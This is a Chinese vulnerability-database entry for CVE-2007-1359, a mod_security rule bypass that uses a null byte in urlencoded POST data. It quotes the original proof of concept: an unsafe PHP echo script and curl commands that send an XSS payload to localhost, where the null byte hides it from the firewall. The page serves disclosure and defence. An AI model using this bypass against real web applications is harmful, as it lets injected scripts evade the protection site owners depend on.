Mod_Security ASCIIZ字节绕过安全限制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112379 漏洞类型 输入验证
发布时间 2007-03-07 更新时间 2008-07-15
CVE编号 CVE-2007-1359 CNNVD-ID CNNVD-200703-271
漏洞平台 Multiple CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3425
https://www.securityfocus.com/bid/22831
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-271
|漏洞详情
mod_security是经常与PHP结合使用的Web应用防火墙。mod_security在处理特定的HTTP数据时存在漏洞,远程攻击者可能利用此漏洞绕过某些安全限制。在接收到请求后mod_security会将其解析成为Web应用参数。由于解析入站数据的方式遵循RFC中所定义的规则而不一定是Perl、Python、Java或PHP中的HTTP请求解析器所兼容的方式,因此如果RFC与实际实现方式不匹配时可能存在一些限制绕过漏洞。其中一种不匹配情况是处理application/x-www-form-urlencoded内容类型的POST数据中ASCIIZ字节的方式。由于mod_security将这种类似的POST数据处理为C字符串,因此不会对第一个ASCIIZ字节后的数据进行任何处理,因为mod_security认为这已是数据的尽头。这允许攻击者轻易的绕过规则限制,攻击受保护的站点。
|漏洞EXP
mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability 
http://www.php-security.org/MOPB/BONUS-12-2007.html 

Affected is mod_security <= 2.1.0 Detailed information 

Detailed information

When mod_security receives a request it parses it into web application 
parameters in a way it believes is correct. Because the way it parses 
the incoming data follows the rules defined in RFCs and not the reality 
of how the HTTP request parsers are implemented in Perl, Python, Java, 
PHP there are a number of bypass vulnerabilities when the RFC and 
reality mismatch. 

One of the these differences is the way ASCIIZ bytes are handled when 
they occur in POST data of the application/x-www-form-urlencoded 
content-type. Because mod_security handles POST data of this kind as a C 
string it does not touch anything behind the first ASCIIZ byte because 
in the eyes of mod_security this is the end of the data. 

Unfortunately for mod_security this is not how the HTTP parsers of the 
different script languages handle this situation. Most script languages 
(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if 
it is legal. Since PHP 5.2.0 this also applies to PHP. Proof of concept, 
exploit or instructions to reproduce 

<?php if (isset($_POST['var']) echo($_POST['var']); ?> 

Now call it with a command like 

$ echo -e "&var=<script>alert(/xss/);</script>" > postdata 
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent 
<script>alert(/xss/);</script> 

The example should not be blocked (because this is the default 
configuration) but in your error.log you will find a line saying that a 
possible XSS attack was detected. 

Now try the same with a ASCIIZ byte embedded. 

$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata 
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent 
<script>alert(/xss/);</script> 

This time there should be no log message in your error.log, because 
mod_security cannot see the var parameter behind the ASCIIZ byte.

# milw0rm.com [2007-03-07]
|受影响的产品
Oracle Oracle10g Application Server 10.1.3 .3.0 Oracle Oracle10g Application Server 10.1.3 .2.0 Oracle Oracle10g Application Server 10.1.3 .1.0 Oracle Oracle10g Application Server 10.1.3 .0.0
|参考资料

来源:XF
名称:modsecurity-formurlencoded-security-bypass(32872)
链接:http://xforce.iss.net/xforce/xfdb/32872
来源:BID
名称:22831
链接:http://www.securityfocus.com/bid/22831
来源:MISC
链接:http://www.php-security.org/MOPB/BONUS-12-2007.html
来源:OSVDB
名称:32778
链接:http://www.osvdb.org/32778
来源:www.modsecurity.org
链接:http://www.modsecurity.org/blog/archives/2007/03/modsecurity_asc.html
来源:GENTOO
名称:GLSA-200705-17
链接:http://www.gentoo.org/security/en/glsa/glsa-200705-17.xml
来源:VUPEN
名称:ADV-2007-0868
链接:http://www.frsirt.com/english/advisories/2007/0868
来源:SECUNIA
名称:25316
链接:http://secunia.com/advisories/25316
来源:SECUNIA
名称:24373
链接:http://secunia.com/advisories/24373
来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
来源:VUPEN
名称:ADV-2008-2115
链接:http://www.frsirt.com/english/advisories/2008/2115
来源:VUPEN
名称:ADV-2008-2109
链接:http://www.frsirt.com/english/advisories/2008/2109/references
来源:SECUNIA
名称:31113
链接:http://secunia.com/advisories/31113
来源:SEC